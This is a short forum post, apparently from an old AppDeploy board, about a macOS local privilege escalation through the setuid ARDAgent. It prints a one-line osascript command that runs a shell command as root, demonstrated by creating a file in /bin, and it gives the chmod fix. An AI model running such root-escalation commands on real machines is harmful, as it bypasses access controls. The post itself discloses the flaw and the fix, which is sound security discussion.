What a way to start this forum. This exploit is starting to hit the news sites.

As a non-privileged user you can do this kind of thing exploiting the remote desktop agent:

osascript -e 'tell app "ARDAgent" to do shell script "touch /bin/foobar"'

And then "ls -l /bin/foobar" you can see that you've written to /bin and created a file owned by root. Try:

rm /bin/foobar

and it'll fail: you need to use sudo. Turns out that the ARDAgent (/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ardagent) has the setuid bit set, where it shouldn't be. So the fix is trivial, just a chmod away.

This is a local exploit and needs physical access. So you know, they could just copy all your files to a USB stick and walk off.

Not every day we see an exploit for the Mac. OK, on to more productive posts!
0 Comments   [ + ] Show Comments

Comments

Please log in to comment

There are no answers at this time
Rating comments in this legacy AppDeploy message board thread won't reorder them,
so that the conversation will remain readable.

Answers

Answer this question or Comment on this question for clarity